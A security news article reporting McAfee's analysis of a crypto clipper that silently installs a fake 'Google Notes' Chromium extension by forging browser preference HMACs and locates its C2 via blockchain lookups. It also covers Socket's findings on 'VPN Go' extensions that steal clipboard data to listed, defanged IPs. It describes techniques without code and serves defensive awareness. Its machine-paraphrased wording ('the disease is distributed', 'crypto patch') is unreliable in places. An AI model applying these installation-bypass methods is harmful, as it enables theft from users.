Cyber Security

Silent Exchange Crypto Clipper Uses Non-Google Notes Extension to Change Wallet Addresses

Cybersecurity researchers have flagged an active browser extension campaign designed to steal cryptocurrency by surreptitiously changing wallet addresses when unsuspecting users initiate the transaction.

The cryptocurrency clipper function is codenamed Replace Silently by McAfee Labs.

“The campaign is delivered via unregistered installers – recognized for both .NET and Golang variants – using a malicious Chromium extension that masquerades as the ‘Google Notes’ utility,” the cybersecurity company said in a technical report shared with Hacker News.

An unsigned installer for .NET, named BaseZipInstaller, is designed to retrieve a ZIP archive, which acts as a base for a malicious browser extension by scanning the system for Chromium-based browsers. For each profile found in those browsers, it forcibly terminates the browser process and installs the extension by modifying the Secure Preferences and Preferences files.

The ultimate goal of the extension is to act as a patch that can intercept and modify wallet addresses copied to the system clipboard with the goal of returning funds to the wallet controlled by the attacker. To achieve its goals, the fake Google Notes extension asks users to grant it permissions to access the clipboard, all URLs, and browsing history.

Because most transactions on the blockchain are irreversible, exchanging addresses can lead to permanent financial losses. McAfee Labs said the operation overlaps with an earlier CountLoader campaign that delivered a crypto patch, with evidence pointing to the same threat actor behind both batches.

What makes Silent Exchange different is that it uses a method called EtherHiding that uses the blockchain as a dead drop solver to find the active server information for control and management (C2). This allows the attacker to slightly update the value of the smart contract to point to the new domain instead of re-deploying the malware itself.

The second feature gets around the secret installation of a browser extension in Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Vivaldi by modifying protected browser settings files. The attack, however, relies on enabling developer mode for newer versions of browsers, something a threat actor can accomplish with public engineering techniques.

“Typically, these browsers store security authentication data (hash/HMAC values) next to sensitive settings to detect unauthorized changes,” McAfee said. “The malware recalculates and updates these security values ​​after tampering with files, tricking the browser into believing that a malicious extension has been installed legitimately.”

“This allows the extension to bypass the normal process of installing the extension’s web store and load it silently without the user’s permission.”

Persistence and campaign avoidance are targeted and layered, with a focus on maintaining low visibility to the end user and high resilience against degradation and static analysis. Persistence is set up by registering the extension by changing the browser’s Secure Preferences file so that it is loaded on the next browser launch without the need for a different method.

In addition, the malware attempts to enable developer mode programmatically in Brave and Opera, and the installer deletes itself after execution, effectively removing the initial compromise indicator. Another way to avoid it is to use a fictitious wallet, which is responsible for downloading a replacement address that matches the victim’s real address.

“It sends the intercepted wallet address to the backend attacker and uses the response to change the real address,” McAfee said. “If the backend request fails, the transaction falls back to the pre-defined hard-coded wallet address, which ensures an uninterrupted transaction.”

For all the same wallet address patterns associated with Bitcoin (BTC), Ethereum, Bitcoin Cash, Ripple, and Dash, it is mapped to a different address controlled by the attacker on the server side. In contrast, all Solana addresses submitted resolve to a single attacker’s address. As of writing, the Solana address was found to have a balance of $1,902.45.

“Each sent address is mapped to a unique attacker-controlled address. Resubmitting the original returns the same, indicating a one-to-one mapping reserved for the server side.

Telemetry data suggests that the disease is distributed globally, with the highest number of victims reported in India. Other countries affected by this campaign include the US, Brazil, Indonesia, and Spain.

“This campaign is a snapshot of where consumer-targeted cryptocurrency theft is going,” McAfee said. “The attacker’s addresses have been changed on the server side, mapping each victim. Fragile hard-coded command and control domains have been replaced by blockchain-based lookups where an operator can move around with a single transaction.”

Chrome and Firefox Extensions Look Like Free VPNs Add Clipboard Holders

The disclosure comes as Socket reports on dangerous extensions for Chrome and Mozilla Firefox, both with the name “VPN Go: Free VPN” in the Chrome Web Store and the Firefox Add-ons marketplace.

“Both extensions present themselves as free VPN tools and include virtual proxy functionality,” said Socket researchers Kirill Boychenko and Kush Pandya. “Under the hood, both also contain a malicious clipboard hijacking concept that continuously monitors the copied text and extracts it to threaten the infrastructure controlled by the actor.”

The behavior goes beyond wallet addresses, as it allows operators to extract all kinds of sensitive data, including passwords, verification codes, API keys, OAuth tokens, and seed phrases.

Further testing of the extensions revealed a pattern of staged malicious updates, where the extension developer first published an incorrect version in the previous extension’s store before introducing the clipboard-stealing ability with the next update.

While versions 1.1 and 1.2 of the Chrome extension were found to extract clipboard data from “178.236.252[.]133,” version 1.3 changes the root channel to a different IP address (“77.91.123[.]187”). In terms of its Firefox equivalent, 1.3.3 is the first version to install the clipboard hacker and send information to “178.236.252[.]133.” The 1.3.4 update moves the infrastructure to “77.91.123[.]187.

Users who have installed one of the extensions are advised to remove them immediately and treat any secrets while the extension is running as compromised.

“The static code is enough to show that the extensions are meant to work as proxy tools, not just to show a fake VPN interface,” Socket said. “Proxy capabilities still increase the risk because they can route browser traffic through infrastructure provided by a malicious actor, expose transparent HTTP traffic and connection metadata, and make the extension appear useful while clipboard monitoring works similarly.”

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button